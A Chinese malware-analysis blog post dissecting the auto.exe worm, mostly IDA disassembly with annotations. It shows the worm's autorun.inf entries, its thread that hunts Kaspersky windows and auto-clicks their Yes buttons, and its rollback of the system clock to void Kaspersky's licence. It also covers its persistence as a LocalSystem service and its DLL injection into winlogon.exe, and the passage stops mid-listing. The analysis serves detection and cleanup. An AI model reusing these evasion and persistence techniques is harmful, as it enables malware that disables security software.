【作者】 cyclotron
【邮箱】 cyclotron at citiz.net
【主页】 http://cyclotron.yculblog.com
【背景】
很久以前就听说有利用 Kaspersky 的 License 弱点来对付杀软的病毒出现,因为冲浪比较小心,一直未曾谋面,然而近日上网却不慎屡次正面交锋,虽然在影子系统的护航下系统免受其害,但又忍不住好奇细细解剖了一番,权作笔记,以飨饱受其苦的网友。
病毒乍看起来没什么特别之处,主程序名为 auto.exe,通常会以隐藏文件的形式埋伏于每个盘的根目录下,辅以久负盛名的 autorun.inf,随着用户在资源管理器(Explorer)中打开磁盘的操作悄悄渗入系统(关闭各类驱动器的自动运行即可切断这条入口):
[AutoRun]
open=auto.exe
shellexecute=auto.exe
shell\Auto\command=auto.exe
脱掉主程序的 Upack 紧身衣,翻开代码故事的第一章:
0040216F _WinMain@16 proc near ; CODE XREF: start+12Fp
0040216F
0040216F var_41C = dword ptr -41Ch
0040216F lpVirusPathName = byte ptr -31Ch
0040216F var_VirusName = dword ptr -21Ch
0040216F var_11C = dword ptr -11Ch
0040216F ThreadId = dword ptr -1Ch
0040216F ServiceStartTable= SERVICE_TABLE_ENTRYA ptr -18h
0040216F var_10 = dword ptr -10h
0040216F var_C = dword ptr -0Ch
0040216F dwSysOpVer = dword ptr -8
0040216F var_SysInfectFlag= dword ptr -4
0040216F arg_szCmdLine = dword ptr 10h
0040216F
0040216F push ebp
00402170 mov ebp, esp
00402172 sub esp, 41Ch
00402178 push ebx
00402179 push esi
0040217A mov esi, offset byte_410F20
0040217F push edi
00402180 mov ebx, offset dword_410D4C ; 接下去要清零的结构
00402185 push esi
00402186 push ebx
00402187 call sprintf ; 一连串sprintf把410D4C处的32h个dword清零初始化
…………………………
…………………………
004023FE call sprintf
00402403 push esi
00402404 push ebx
00402405 call sprintf
0040240A call GetSystemVersion ; 取得操作系统版本
0040240F mov [ebp+dwSysOpVer], eax
00402412 mov al, ds:byte_410F20
00402417 push 3Fh
00402419 mov byte ptr [ebp+var_VirusName], al
0040241F pop ecx
00402420 xor eax, eax
00402422 lea edi, [ebp+var_VirusName+1]
00402428 push esi
00402429 rep stosd
0040242B stosw
0040242D lea eax, [ebp+var_VirusName]
00402433 push eax
00402434 call strcpy ; 把自己的名字copy一下
00402439 lea eax, [ebp+var_VirusName]
0040243F push offset aAu ; "au"
00402444 push eax
00402445 call strcat
0040244A lea eax, [ebp+var_VirusName]
00402450 push offset aTo_e ; "to.e"
00402455 push eax
00402456 call strcat
0040245B add esp, 40h
0040245E lea eax, [ebp+var_VirusName]
00402464 push offset aXe ; "xe"
00402469 push eax
0040246A call strcat
【第一宗罪】 卡巴终结者
大多数病毒为躲避杀软的追击,往往使出各种手段隐匿自身代码和文件,RootKit、多态变形等手法层出不穷。然而我们这里的主角面对卡巴毫无惧色,主动出击剿灭卡巴的进程和窗口,意欲除之而后快,堂堂卡巴面对如此对手,也只能玩起 Tom&Jerry 的游戏,至少在笔者的电脑上,卡巴剿之不及,auto.exe 大有春风吹又生之势。
0040246F pop ecx
00402470 lea eax, [ebp+ThreadId]
00402473 pop ecx
00402474 push eax ; lpThreadId
00402475 xor eax, eax
00402477 push eax ; dwCreationFlags
00402478 push eax ; lpParameter
00402479 push offset lpAntiAVThread ; lpStartAddress
{
00402105
00402105
; Thread routine passed to CreateThread as lpStartAddress (00402479-00402480).
; Endless loop: EnumWindows(EnumFunc, 0), then look for one top-level window and,
; if it exists, send a left-button down/up pair to one of its child buttons.
; Register roles: esi = FindWindowExA, edi = SendMessageA, ebx = 0 (used as NULL/0).
; EnumFunc's body is not included in this listing, so its per-window action is not shown.
; NOTE(review): the one-byte instruction at 00402105 (presumably push ebx) is missing
; from the listing; the first instruction shown is at 00402106.
; Analyst note: the dialog is answered purely through window messages sent from
; another process, i.e. the button is "pressed" with no user input involved.
00402105 lpAntiAVThread proc near
00402106 push ebp
00402107 push esi
00402108 mov esi, ds:FindWindowExA
0040210E push edi
0040210F mov edi, ds:SendMessageA
00402115 xor ebx, ebx
00402117
00402117 loc_402117:
00402117 push ebx ; lParam
00402118 push offset EnumFunc ; lpEnumFunc
0040211D call ds:EnumWindows ; enumerate top-level windows (author: looking for AV windows)
00402123 push 64h ; dwMilliseconds (100 ms)
00402125 call ds:Sleep
0040212B push offset byte_410BB0 ; LPCSTR (window title; contents not shown in the listing)
00402130 push offset a32770 ; LPCSTR (window class; the symbol name suggests "#32770", the dialog class - confirm)
00402135 push ebx ; HWND
00402136 push ebx ; HWND
00402137 call esi ; FindWindowExA
00402139 cmp eax, ebx
0040213B jz short loc_402162 ; no such window: skip the click and just sleep
0040213D push offset aY ; LPCSTR
00402142 push offset aButton ; LPCSTR
00402147 push ebx ; HWND
00402148 push eax ; HWND
00402149 call esi ; FindWindowExA ; child button titled aY (per the author, the "是(&Y)" / Yes button)
0040214B push ebx ; lParam
0040214C mov ebp, eax ; button handle kept in ebp; it is not checked for NULL before use
0040214E push 1 ; wParam
00402150 push WM_LBUTTONDOWN ; Msg
00402155 push ebp ; hWnd
00402156 call edi ; SendMessageA ; send the mouse-button-down half of the click
00402158 push ebx ; lParam
00402159 push ebx ; wParam
0040215A push WM_LBUTTONUP ; Msg
0040215F push ebp ; hWnd
00402160 call edi ; SendMessageA
00402162
00402162 loc_402162:
00402162 push 7D0h ; dwMilliseconds (2000 ms)
00402167 call ds:Sleep
0040216D jmp short loc_402117 ; loop forever: this is the watchdog thread
0040216D lpAntiAVThread endp ; per the author: acts against the AV as soon as it is seen running
}
0040247E push eax ; dwStackSize
0040247F push eax ; lpThreadAttributes
00402480 call ds:CreateThread ; 启动Anti-AV守护线程
00402486 mov edi, ds:Sleep
0040248C push 3E8h ; dwMilliseconds
00402491 call edi ; Sleep
00402493 and [ebp+var_SysInfectFlag], 0
00402497 push esi
00402758 push offset aDd33gsd2 ; "dd33gsd2"
0040275D call strcpy
00402762 lea eax, [ebp+var_11C]
00402768 push eax
00402769 lea eax, [ebp+var_11C]
0040276F push eax
00402770 call sub_402E93
00402775 lea eax, [ebp+var_11C]
0040277B push eax
0040277C push offset aDd33gsd2_exe_0 ; "dd33gsd2.exe"
00402781 call strcpy
00402786 push offset a_exe ; ".EXE"
0040278B push offset aDd33gsd2_exe_0 ; "dd33gsd2.exe"
00402790 call strcat ; 以VolumeSerialNumber命名exe
00402795 lea eax, [ebp+var_11C]
0040279B push eax
0040279C lea eax, [ebp+var_11C]
004027A2 push eax
004027A3 call sub_402E93
004027A8 add esp, 28h
004027AB push 1 ; dwMilliseconds
004027AD call edi ; Sleep
004027AF lea eax, [ebp+var_11C]
004027B5 push eax
004027B6 push offset aDd33gsd2_dll ; "dd33gsd2.dll"
004027BB call strcpy
004027C0 push offset a_dll ; ".DLL"
004027C5 push offset aDd33gsd2_dll ; "dd33gsd2.dll"
004027CA call strcat ; 以VolumeSerialNumber命名Dll
004027CF add esp, 10h
004027D2 lea eax, [ebp+var_11C]
004027D8 push eax
004027D9 push offset dword_410E1C
004027DE call ds:lstrcpy
【第二宗罪】 主动打开资源管理器,放行 autorun.inf
autorun.inf 并不是本文主角的专利,早在春秋战国时期就已经成为各路病毒愚弄菜菜的常备武器。然而在大家都是静候菜菜插入优盘、在资源管理器里打开盘符之时,auto.exe 却再次主动出击,迫不及待地用 Explorer.exe 打开所在盘的根目录,为 autorun.inf 开路。
0040281C lea eax, [ebp+lpVirusPathName]
00402822 push 104h ; nSize
00402827 push eax ; lpFilename
00402828 push 0 ; hModule
0040282A call ds:GetModuleFileNameA ; 取得病毒当前路径
00402830 test eax, eax
00402832 jnz short loc_40283C
00402834 push 1
00402836 pop eax
00402837 jmp loc_402C04
0040283C ; ----------------------------------------------------------------------------
0040283C
0040283C loc_40283C: ; CODE XREF: WinMain(x,x,x,x)+6C3j
0040283C lea eax, [ebp+var_VirusName]
00402842 push eax
00402843 lea eax, [ebp+lpVirusPathName]
00402849 push eax
0040284A call strstr ; 检索病毒文件字符串 auto.exe
0040284F pop ecx
00402850 test eax, eax
00402852 pop ecx
00402853 jz short loc_4028A7 ; emmm...
00402853 ; 老毒物没有在当前根目录下找到auto.exe
00402853 ; 说明已经感染到系统目录下了
00402855 lea eax, [ebp+lpVirusPathName]
0040285B push eax
0040285C call strlen
00402861 cmp eax, 2
00402864 pop ecx
00402865 jbe short loc_4028A7
00402867 movsx eax, [ebp+lpVirusPathName]
0040286E push eax
0040286F lea eax, [ebp+lpVirusPathName]
00402875 push offset aC ; "%c:\\"
0040287A push eax
0040287B mov [ebp+var_SysInfectFlag], 1
00402882 call sprintf ; 生成所在根目录字符串,如C:\
00402887 add esp, 0Ch
0040288A lea eax, [ebp+lpVirusPathName]
00402890 push 1 ; nShowCmd
00402892 push 0 ; lpDirectory
00402894 push eax ; lpParameters
00402895 push offset aExplorer_exe ; lpFile
0040289A push offset aOpen ; lpOperation
0040289F push 0 ; hwnd
004028A1 call ds:ShellExecuteA ; 用Explorer.exe打开该根目录
004028A1 ; 由于inf文件的存在此时会自动
004028A1 ; 执行auto.exe
【第三宗罪】 时光倒流——
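这一招可是再次刺痛了卡巴的要害:只要发现 avp.exe 进程在运行,且系统年份大于 2005(7D5h),就用 SetSystemTime 把年份改回 2005 年,让卡巴的 License 在时间校验上失效。系统时间被无故回拨,本身就是值得排查的异常。(卡巴:auto 啊 auto,我俩本无瓜葛,你为何就如此针对我捏? >.<)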
004028A7 loc_4028A7:
004028A7
004028A7 call FoolKaspersky
{
00401000 FoolKaspersky proc near
00401000
00401000 SystemTime = SYSTEMTIME ptr -10h
00401000
00401000 push ebp
00401001 mov ebp, esp
00401003 sub esp, 10h
00401006 push esi
…………………………
…………………………
00401298 push offset aAvp_exe ; "avp.exe"
0040129D call CountAVP ; 查找AVP相关的进程数
004012A2 add esp, 2Ch
004012A5 test eax, eax
004012A7 pop edi
004012A8 pop esi
004012A9 jg short loc_4012B0 ; 当进程数不为0时
004012A9 ; 修改系统时间使AVP License失效
004012AB or eax, 0FFFFFFFFh
004012AE leave
004012AF retn
004012B0 ; ----------------------------------------------------------------------------
004012B0
004012B0 loc_4012B0:
004012B0 lea eax, [ebp+SystemTime] ; 当进程数不为0时
004012B0 ; 修改系统时间使AVP License失效
004012B3 push eax ; lpSystemTime
004012B4 call ds:GetSystemTime
004012BA cmp [ebp+SystemTime.wYear], 7D5h
004012C0 jbe short loc_4012D2
004012C2 lea eax, [ebp+SystemTime]
004012C5 mov [ebp+SystemTime.wYear], 7D5h
004012CB push eax ; lpSystemTime
004012CC call ds:SetSystemTime
004012D2
004012D2 loc_4012D2:
004012D2 push 4E20h ; dwMilliseconds
004012D7 call ds:Sleep
004012DD push 1
004012DF pop eax
004012E0 leave
004012E1 retn
004012E1 FoolKaspersky endp
}
004028AC cmp [ebp+dwSysOpVer], VER_PLATFORM_WIN32_NT
004028B0 jnz loc_402BEF ; 如果是Win9x,下面的部分就可以幸免了
004028B6 push 0FFh
004028BB lea eax, [ebp+var_41C]
004028C1 push 0
004028C3 push eax
004028C4 call memset ; 填零初始化
【第四宗罪】 伪装系统服务派发员
auto.exe 不是街头混混,出手如此大气,足见其志在高远。只可惜笔者这块内容生疏,回头恶补 MSDN 再奉上。。。
004028BB lea eax, [ebp+var_41C]
004028C1 push 0
004028C3 push eax
004028C4 call memset ; 填零初始化
004028C9 add esp, 0Ch
004028CC lea eax, [ebp+var_41C]
004028D2 push offset aDd33gsd2_exe_0 ; "dd33gsd2.exe"
004028D7 push eax
004028D8 call ds:lstrcpy ; 复制刚才根据VolumeSerialNumber
004028D8 ; 生成的[VolumeSerialNumber].exe名称
004028DE lea eax, [ebp+var_41C]
004028E4 push 1
004028E6 push eax
004028E7 call CopySelfToSysDir_As_VSNexe ;
004028E7 ; 把自身以[VolumeSerialNumber].exe
004028E7 ; 为名复制到系统目录
; Branch on the "-k" command-line switch.
; Not found (strstr returns NULL) -> loc_402BB1, which appends " -k" to the copied path and
; calls RegisterVirusService / StartVirusService (installer role).
; Found -> fall through: fill ServiceStartTable and later call StartServiceCtrlDispatcherA
; at 00402BA4 (service role; presumably this is the instance launched from the registered ImagePath).
004028EC push offset aK ; "-k"
004028F1 push [ebp+arg_szCmdLine]
004028F4 call strstr ; does the command line contain "-k"?
004028F9 add esp, 10h
004028FC test eax, eax
004028FE jz loc_402BB1 ; taken when "-k" is absent: go register and start the service
00402904 xor edi, edi ; "-k" is present: this instance runs as the service itself and
00402904 ; sets up its SERVICE_TABLE_ENTRYA (name + VirusServiceProc) below
00402906 push esi
00402907 push ebx
00402908 mov [ebp+ServiceStartTable.lpServiceName], offset aDd33gsd2_1 ; "dd33gsd2"
0040290F mov [ebp+ServiceStartTable.lpServiceProc], offset VirusServiceProc
{
004019D1 VirusServiceProc proc near
004019D1
004019D1 ThreadId = dword ptr -108h
004019D1 ServiceName = byte ptr -104h
…………………………
…………………………
00401CA5 push 40h
00401CA7 mov [esp+144h+ServiceName], al
00401CAB pop ecx
00401CAC xor eax, eax
00401CAE lea edi, [esp+3Dh]
00401CB2 rep stosd
00401CB4 stosw
00401CB6 stosb
00401CB7 lea eax, [esp+140h+ServiceName]
00401CBB push offset aDd33gsd2_1 ; "dd33gsd2"
00401CC0 push eax
00401CC1 call strcpy
00401CC6 add esp, 30h
00401CC9 lea eax, [esp+118h+ServiceName]
00401CCD push offset HandlerProc ; lpHandlerProc
00401CD2 push eax ; lpServiceName
00401CD3 call ds:RegisterServiceCtrlHandlerA
00401CD9 mov ds:hServiceStatus, eax
00401CDE call ds:GetLastError
00401CE4 mov eax, ds:hServiceStatus
00401CE9 cmp eax, ebp
00401CEB jz loc_40200D
00401CF1 mov edi, ds:SetServiceStatus
00401CF7 push offset stru_410D30 ; lpServiceStatus
00401CFC push eax ; hServiceStatus
00401CFD mov ds:stru_410D30.dwCurrentState, 4
00401D07 call edi ; SetServiceStatus
…………………………
…………………………
00401F8F lea eax, [esp+118h+ThreadId]
00401F93 push eax ; lpThreadId
00401F94 push ebp ; dwCreationFlags
00401F95 push ebp ; lpParameter
00401F96 push offset InjectDll2Winlogon ; lpStartAddress
00401F9B push ebp ; dwStackSize
00401F9C push ebp ; lpThreadAttributes
00401F9D call ds:CreateThread
00401FA3 cmp ds:dword_410F1C, ebp
00401FA9 mov esi, ds:Sleep
00401FAF push 1
00401FB1 pop ebx
00401FB2 jnz short loc_401FC6
00401FB4
00401FB4 loc_401FB4:
00401FB4 push ebx ; dwMilliseconds
00401FB5 call esi ; Sleep
00401FB7 push 12Ch ; dwMilliseconds
00401FBC call esi ; Sleep
00401FBE cmp ds:dword_410F1C, ebp
00401FC4 jz short loc_401FB4
00401FC6
00401FC6 loc_401FC6:
00401FC6 cmp ds:stru_410D30.dwCurrentState, 4
00401FCD jnz short loc_40200D
00401FCF push offset stru_410D30 ; lpServiceStatus
00401FD4 mov ds:stru_410D30.dwServiceType, 110h
00401FDE push ds:hServiceStatus ; hServiceStatus
00401FE4 mov ds:stru_410D30.dwCurrentState, ebx
00401FEA mov ds:stru_410D30.dwControlsAccepted, ebx
00401FF0 mov ds:stru_410D30.dwWin32ExitCode, ebp
00401FF6 mov ds:stru_410D30.dwCheckPoint, ebp
00401FFC mov ds:stru_410D30.dwWaitHint, ebp
00402002 call edi ; SetServiceStatus
00402004 push 7530h ; dwMilliseconds
00402009 call esi ; Sleep
0040200B jmp short loc_401FC6
0040200D ; ----------------------------------------------------------------------------
0040200D
0040200D loc_40200D:
0040200D pop edi
0040200E pop esi
0040200F pop ebp
00402010 pop ebx
00402011 add esp, 108h
00402017 retn
00402017 VirusServiceProc endp
}
00402916 mov [ebp+var_10], edi
00402919 mov [ebp+var_C], edi
…………………………
…………………………
; Service role: hand the table built at 00402908-0040290F to the service control manager.
00402BA0 lea eax, [ebp+ServiceStartTable]
00402BA3 push eax ; lpServiceStartTable
00402BA4 call ds:StartServiceCtrlDispatcherA ; connect this process to the SCM; the table names VirusServiceProc as the service routine
00402BAA neg eax ; CF = (eax != 0)
00402BAC sbb eax, eax ; eax = -1 if the call returned nonzero, else 0
00402BAE inc eax ; eax = 0 if the dispatcher call returned nonzero, 1 if it returned 0
00402BAF jmp short loc_402C04 ; loc_402C04 is outside this listing (presumably WinMain's exit path)
【第五宗罪】 注入系统进程,Hook 无处不在
在上面的 ServiceDispatcher 中,最辣手的一招绝非伪装派遣本身,而是隐含在其中的远程代码注入。auto.exe 的病毒体中附带了一个真正用来干坏事的 Dll,在伪装派遣的过程中以卷序列号(VolumeSerialNumber)命名,被释放到系统目录下,当然同时被释放过去的还有病毒体本身,一搭一档构成了下面注册系统服务的文件。在清除的过程中,最难对付的非该 Dll 莫属。一旦被注册到系统服务,该 Dll 就会注入到大量的系统进程中,随时监视和刷新对它不利的操作;在该 Dll 从这些进程中卸载之前,任何对其注册表项的修改都会遭到即时反攻,令对手欲除之而不能。
0040183D ; DWORD __stdcall InjectDll2Winlogon(LPVOID)
; Thread routine started from VirusServiceProc (CreateThread at 00401F96-00401F9D).
; Visible steps: build <system dir>\<dll name> and <system dir>\<exe name>, write 0B000h
; bytes from byte_405010 to the DLL path, then (NT only) look up winlogon.exe and pass
; the DLL path to Inject_winlogon_exe; finally set dword_410F1C = 1, the flag that
; VirusServiceProc polls at 00401FA3 / 00401FBE.
; "dd33gsd2.dll" is IDA's view of the static buffer aDd33gsd2_dll; WinMain overwrites that
; buffer with the generated name at 004027B6-004027CA, so the on-disk name differs per host.
; aDd33gsd2_exe is a different symbol from the aDd33gsd2_exe_0 buffer WinMain rewrites;
; whether it is rewritten too is not visible in this listing.
; Bodies of FindSpecificProcess and Inject_winlogon_exe are not shown.
0040183D InjectDll2Winlogon proc near
0040183D
0040183D var_szExeName = dword ptr -308h
0040183D var_szSysDir = byte ptr -208h
0040183D var_szDllName = byte ptr -108h
0040183D NumberOfBytesWritten= dword ptr -8
0040183D var_OpSysVer = dword ptr -4
0040183D
0040183D push ebp
0040183E mov ebp, esp
00401840 sub esp, 308h
00401846 push esi
00401847 push edi
00401848 call GetSystemVersion
0040184D mov esi, ds:GetSystemDirectoryA
00401853 mov [ebp+var_OpSysVer], eax
00401856 mov edi, 0FFh
0040185B lea eax, [ebp+var_szSysDir]
00401861 push edi ; uSize
00401862 push eax ; lpBuffer
00401863 call esi ; GetSystemDirectoryA
00401865 test eax, eax
00401867 jz loc_401974 ; failure: leave without touching dword_410F1C
0040186D lea eax, [ebp+var_szSysDir]
00401873 push edi ; uSize
00401874 push eax ; lpBuffer
00401875 call esi ; GetSystemDirectoryA ; same call repeated with the same arguments
00401877 test eax, eax
00401879 jz loc_401974
0040187F lea eax, [ebp+var_szSysDir]
00401885 push eax
00401886 lea eax, [ebp+var_szDllName]
0040188C push eax
0040188D call strcpy ; var_szDllName = system directory
00401892 mov esi, offset asc_410B74 ; "\\"
00401897 lea eax, [ebp+var_szDllName]
0040189D push esi
0040189E push eax
0040189F call strcat
004018A4 lea eax, [ebp+var_szDllName]
004018AA push offset aDd33gsd2_dll ; "dd33gsd2.dll"
004018AF push eax
004018B0 call strcat ; var_szDllName = <system dir>\<dll name>
004018B5 add esp, 18h
004018B8 lea eax, [ebp+var_szSysDir]
004018BE push eax
004018BF lea eax, [ebp+var_szExeName]
004018C5 push eax
004018C6 call ds:lstrcpy
004018CC lea eax, [ebp+var_szExeName]
004018D2 push esi
004018D3 push eax
004018D4 call strcat
004018D9 lea eax, [ebp+var_szExeName]
004018DF push offset aDd33gsd2_exe ; "dd33gsd2.exe"
004018E4 push eax
004018E5 call strcat ; var_szExeName = <system dir>\<exe name>; not referenced again in this routine
004018EA add esp, 10h
004018ED xor edi, edi
004018EF lea eax, [ebp+var_szDllName]
004018F5 push edi ; hTemplateFile
004018F6 push edi ; dwFlagsAndAttributes
004018F7 push 2 ; dwCreationDisposition (CREATE_ALWAYS)
004018F9 push edi ; lpSecurityAttributes
004018FA push edi ; dwShareMode
004018FB push 40000000h ; dwDesiredAccess (GENERIC_WRITE)
00401900 push eax ; lpFileName
00401901 call ds:CreateFileA
00401907 mov esi, eax
00401909 cmp esi, 0FFFFFFFFh
0040190C jz short loc_401924 ; INVALID_HANDLE_VALUE: skip the write
0040190E lea eax, [ebp+NumberOfBytesWritten]
00401911 push edi ; lpOverlapped
00401912 push eax ; lpNumberOfBytesWritten
00401913 push 0B000h ; nNumberOfBytesToWrite
00401918 push offset byte_405010 ; lpBuffer (payload embedded in the unpacked image)
0040191D push esi ; hFile
0040191E call ds:WriteFile ; create [VolumeSerialNumber].dll; the result is not checked
00401924
00401924 loc_401924:
00401924 push ebx ; saves ebx (restored at 00401973); not an argument
00401925 push esi ; hObject
00401926 call ds:CloseHandle ; also reached with INVALID_HANDLE_VALUE when CreateFileA failed
0040192C cmp [ebp+var_OpSysVer], VER_PLATFORM_WIN32_NT
00401930 mov esi, ds:Sleep
00401936 push 1
00401938 mov edi, 0BB8h
0040193D pop ebx ; ebx = 1, the value later stored in dword_410F1C
0040193E jnz short loc_40196A ; not NT: skip the winlogon step (flags still from the cmp at 0040192C)
00401940 push 0
00401942 push offset aWinlogon_exe ; "winlogon.exe"
00401947 call FindSpecificProcess ; look up the winlogon.exe process
0040194C pop ecx
0040194D test eax, eax
0040194F pop ecx
00401950 jz short loc_401961
00401952 push eax ; value returned by FindSpecificProcess
00401953 lea eax, [ebp+var_szDllName]
00401959 push eax
0040195A call Inject_winlogon_exe ; inject [VolumeSerialNumber].dll into winlogon.exe
0040195F pop ecx
00401960 pop ecx
00401961
00401961 loc_401961:
00401961 push edi ; dwMilliseconds (3000 ms)
00401962 call esi ; Sleep
00401964 mov ds:dword_410F1C, ebx
0040196A
0040196A loc_40196A:
0040196A push edi ; dwMilliseconds (3000 ms; the NT path falls through and sleeps twice)
0040196B call esi ; Sleep
0040196D mov ds:dword_410F1C, ebx ; signal VirusServiceProc that this thread is done
00401973 pop ebx
00401974
00401974 loc_401974:
00401974 pop edi
00401975 pop esi
00401976 leave
00401977 retn
00401977 InjectDll2Winlogon endp
【第六宗罪】 注册系统服务,启动无影无踪
前面说到 auto.exe 志存高远,早已放弃同行广泛采用的自启动,而改用系统服务的方式深深侵入到系统的脊髓,加上远程注入 Dll 全程护航,普通的清除方式已经难以奏效。在被感染的系统中,系统服务列表中会增加一项以卷序列号(VolumeSerialNumber)命名的自启动服务,其支持者恰为前面释放到系统目录的病毒体和 Dll。排查时可核对该服务项的取值:ImagePath 以 " -k" 结尾、Start=2、Type=10h、ObjectName=LocalSystem。
00402BB1
00402BB1 loc_402BB1:
00402BB1 lea eax, [ebp+var_41C]
00402BB7 push offset aK_0 ; " -k"
00402BBC push eax
00402BBD call ds:lstrcat
00402BC3 push 1
00402BC5 push 0BB8h
00402BCA lea eax, [ebp+var_41C]
00402BD0 push offset dword_410E1C
00402BD5 push eax
00402BD6 mov esi, offset aDd33gsd2_1 ; "dd33gsd2"
00402BDB push offset aDd33gsd2_0 ; "dd33gsd2"
00402BE0 push esi
00402BE1 call RegisterVirusService ; 注册病毒服务
{
; RegisterVirusService(lpServiceName, lpDisplayName, lpBinaryPathName, arg_C, dwMilliseconds, arg_14)
; Creates or reconfigures a Win32 service and then writes the same settings directly into
; the service's registry key. The key path is assembled at run time from three fragments
; ("SYSTEM\\Curr" + "entControlSe" + "t\\Services\\") plus lpServiceName.
; Values written (helper bodies SetVirusServiceKeys / sub_402DC6 are not shown; presumably
; string and DWORD writers respectively):
;   DisplayName = lpServiceName     Description = arg_C        ErrorControl = 1
;   ImagePath   = lpBinaryPathName  ObjectName  = "LocalSystem"
;   Start       = 2                 Type        = 10h
; The whole sequence repeats every dwMilliseconds unless arg_14 == 1; the call site at
; 00402BC3-00402BE1 passes arg_14 = 1 and dwMilliseconds = 0BB8h, i.e. a single pass.
; Handle handling as written: hSCManager is never closed here, the CreateServiceA result
; is discarded, and hSCObject is closed at loc_4030B9 even on paths where it was not set.
00402F83 RegisterVirusService proc near
00402F83
00402F83 var_110 = dword ptr -110h
00402F83 pcbBytesNeeded = dword ptr -10h
00402F83 var_C = dword ptr -0Ch
00402F83 hSCManager = dword ptr -8
00402F83 hSCObject = dword ptr -4
00402F83 lpServiceName = dword ptr 8
00402F83 lpDisplayName = dword ptr 0Ch
00402F83 lpBinaryPathName= dword ptr 10h
00402F83 arg_C = dword ptr 14h
00402F83 dwMilliseconds = dword ptr 18h
00402F83 arg_14 = dword ptr 1Ch
00402F83
00402F83 push ebp
00402F84 mov ebp, esp
00402F86 sub esp, 110h
00402F8C mov al, ds:byte_410F20
00402F91 push ebx
00402F92 push esi
00402F93 push edi
00402F94 push 3Fh
00402F96 mov byte ptr [ebp+var_110], al ; first byte of the key-path buffer
00402F9C pop ecx ; ecx = 3Fh dwords for rep stosd
00402F9D xor eax, eax
00402F9F lea edi, [ebp+var_110+1]
00402FA5 push offset aSystemCurr ; "SYSTEM\\Curr"
00402FAA rep stosd ; zero the rest of var_110 (3Fh dwords + 1 word)
00402FAC stosw
00402FAE lea eax, [ebp+var_110]
00402FB4 push eax
00402FB5 call ds:lstrcpy ; var_110 = "SYSTEM\\Curr"
00402FBB mov esi, ds:lstrcat
00402FC1 lea eax, [ebp+var_110]
00402FC7 push offset aEntcontrolse ; "entControlSe"
00402FCC push eax
00402FCD call esi ; lstrcat
00402FCF lea eax, [ebp+var_110]
00402FD5 push offset aTServices ; "t\\Services\\"
00402FDA push eax
00402FDB call esi ; lstrcat
00402FDD push [ebp+lpServiceName]
00402FE0 lea eax, [ebp+var_110]
00402FE6 push eax
00402FE7 call esi ; lstrcat ; var_110 = SYSTEM\CurrentControlSet\Services\<lpServiceName>
00402FE9 xor edi, edi ; edi = 0, used as NULL below
00402FEB mov ebx, 0F01FFh ; SERVICE_ALL_ACCESS, used for OpenServiceA and CreateServiceA
00402FF0 mov esi, offset aDescription ; "Description"
00402FF5
00402FF5 loc_402FF5:
00402FF5 push 0F003Fh ; dwDesiredAccess (SC_MANAGER_ALL_ACCESS)
00402FFA push edi ; lpDatabaseName
00402FFB push edi ; lpMachineName
00402FFC call ds:OpenSCManagerA ; Establish a connection to the service
00402FFC ; control manager on the specified computer
00402FFC ; and opens the specified database
00403002 cmp eax, edi
00403004 mov [ebp+hSCManager], eax
00403007 jz loc_4030B9 ; no SCM handle: skip the API path, the registry writes below still run
0040300D push ebx ; dwDesiredAccess
0040300E push [ebp+lpServiceName] ; lpServiceName
00403011 push eax ; hSCManager
00403012 call ds:OpenServiceA
00403018 cmp eax, edi
0040301A mov [ebp+hSCObject], eax
0040301D jz short loc_403088 ; service does not exist yet: create it
0040301F push 400h ; uBytes
00403024 push 40h ; uFlags
00403026 call ds:LocalAlloc ; buffer for QueryServiceConfigA; no LocalFree appears in this routine
0040302C cmp eax, edi
0040302E mov [ebp+var_C], eax
00403031 jz short loc_403088
00403033 lea ecx, [ebp+pcbBytesNeeded]
00403036 push ecx ; pcbBytesNeeded
00403037 push 400h ; cbBufSize
0040303C push eax ; lpServiceConfig
0040303D push [ebp+hSCObject] ; hService
00403040 call ds:QueryServiceConfigA
00403046 test eax, eax
00403048 jz short loc_403088
0040304A mov eax, [ebp+var_C]
0040304D cmp dword ptr [eax+4], 2 ; offset 4 of the config block (dwStartType in QUERY_SERVICE_CONFIGA) == 2?
00403051 jnz short loc_40305B
00403053 mov eax, [eax+0Ch] ; offset 0Ch (lpBinaryPathName pointer in QUERY_SERVICE_CONFIGA)
00403056 cmp eax, [ebp+lpBinaryPathName] ; compares two pointers, not the strings they point to
00403059 jz short loc_403088
0040305B
0040305B loc_40305B:
0040305B push [ebp+lpDisplayName] ; lpDisplayName
0040305E push edi ; lpPassword
0040305F push edi ; lpServiceStartName
00403060 push edi ; lpDependencies
00403061 push edi ; lpdwTagId
00403062 push edi ; lpLoadOrderGroup
00403063 push [ebp+lpBinaryPathName] ; lpBinaryPathName
00403066 push 0FFFFFFFFh ; dwErrorControl (SERVICE_NO_CHANGE)
00403068 push 2 ; dwStartType (SERVICE_AUTO_START)
0040306A push 10h ; dwServiceType (SERVICE_WIN32_OWN_PROCESS)
0040306C push [ebp+hSCObject] ; hService
0040306F call ds:ChangeServiceConfigA ; force the existing service back to this binary path and auto-start
00403075 push [ebp+arg_C]
00403078 lea eax, [ebp+var_110]
0040307E push esi
0040307F push eax
00403080 call SetVirusServiceKeys ; (key path, "Description", arg_C)
00403085 add esp, 0Ch
00403088
00403088 loc_403088:
00403088 push edi ; lpPassword
00403089 push edi ; lpServiceStartName
0040308A push edi ; lpDependencies
0040308B push edi ; lpdwTagId
0040308C push edi ; lpLoadOrderGroup
0040308D push [ebp+lpBinaryPathName] ; lpBinaryPathName
00403090 push 1 ; dwErrorControl
00403092 push 2 ; dwStartType (SERVICE_AUTO_START)
00403094 push 10h ; dwServiceType (SERVICE_WIN32_OWN_PROCESS)
00403096 push ebx ; dwDesiredAccess
00403097 push [ebp+lpDisplayName] ; lpDisplayName
0040309A push [ebp+lpServiceName] ; lpServiceName
0040309D push [ebp+hSCManager] ; hSCManager
004030A0 call ds:CreateServiceA ; also reached by fall-through after ChangeServiceConfigA; returned handle is not kept
004030A6 push [ebp+arg_C]
004030A9 lea eax, [ebp+var_110]
004030AF push esi
004030B0 push eax
004030B1 call SetVirusServiceKeys ; (key path, "Description", arg_C)
004030B6 add esp, 0Ch
004030B9
004030B9 loc_4030B9:
004030B9 push [ebp+hSCObject] ; hSCObject
004030BC call ds:CloseServiceHandle
004030C2 push 1 ; dwMilliseconds
004030C4 call ds:Sleep
004030CA push [ebp+lpServiceName]
004030CD lea eax, [ebp+var_110]
004030D3 push offset aDisplayname ; "DisplayName"
004030D8 push eax
004030D9 call SetVirusServiceKeys ; DisplayName = lpServiceName
004030DE push [ebp+arg_C]
004030E1 lea eax, [ebp+var_110]
004030E7 push esi
004030E8 push eax
004030E9 call SetVirusServiceKeys ; Description = arg_C
